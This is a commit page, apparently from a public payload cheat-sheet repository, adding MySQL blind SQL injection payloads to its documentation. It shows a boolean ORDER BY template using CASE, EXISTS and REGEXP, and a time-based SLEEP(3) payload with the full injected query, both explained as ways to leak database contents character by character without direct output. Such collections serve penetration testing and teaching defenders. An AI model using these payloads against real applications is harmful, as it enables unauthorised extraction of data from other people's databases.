Merge pull request #162 from SecGus/master

Blind SQL Injection payloads missing from the website.
patch-1
Swissky 2020-03-02 15:22:44 +01:00 committed by GitHub
commit 9207e0204c
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 23 additions and 0 deletions

View File

@ -232,6 +232,29 @@ Works with `MySQL >= 5.1`
?id=1 AND SELECT SUBSTR(column_name,1,1) FROM information_schema.columns > 'A'
```
### MySQL Blind SQL Injection in ORDER BY clause using a binary query and REGEXP
This query basically orders by one column or the other, depending on whether the EXISTS() returns a 1 or not.
For the EXISTS() function to return a 1, the REGEXP query needs to match up, this means you can bruteforce blind values character by character and leak data from the database without direct output.
```
[...] ORDER BY (SELECT (CASE WHEN EXISTS(SELECT [COLUMN] FROM [TABLE] WHERE [COLUMN] REGEXP "^[BRUTEFORCE CHAR BY CHAR].*" AND [FURTHER OPTIONS / CONDITIONS]) THEN [ONE COLUMN TO ORDER BY] ELSE [ANOTHER COLUMN TO ORDER BY] END)); -- -
```
### MySQL Blind SQL Injection binary query using REGEXP.
Payload:
```
' OR (SELECT (CASE WHEN EXISTS(SELECT name FROM items WHERE name REGEXP "^a.*") THEN SLEEP(3) ELSE 1 END)); -- -
```
Would work in the query (where the "where" clause is the injection point):
```
SELECT name,price FROM items WHERE name = '' OR (SELECT (CASE WHEN EXISTS(SELECT name FROM items WHERE name REGEXP "^a.*") THEN SLEEP(3) ELSE 1 END)); -- -';
```
In said query, it will check to see if an item exists in the "name" column in the "items" database that starts with an "a". If it will sleep for 3 seconds per item.
### MYSQL Blind using a conditional statement
TRUE: `if @@version starts with a 5`: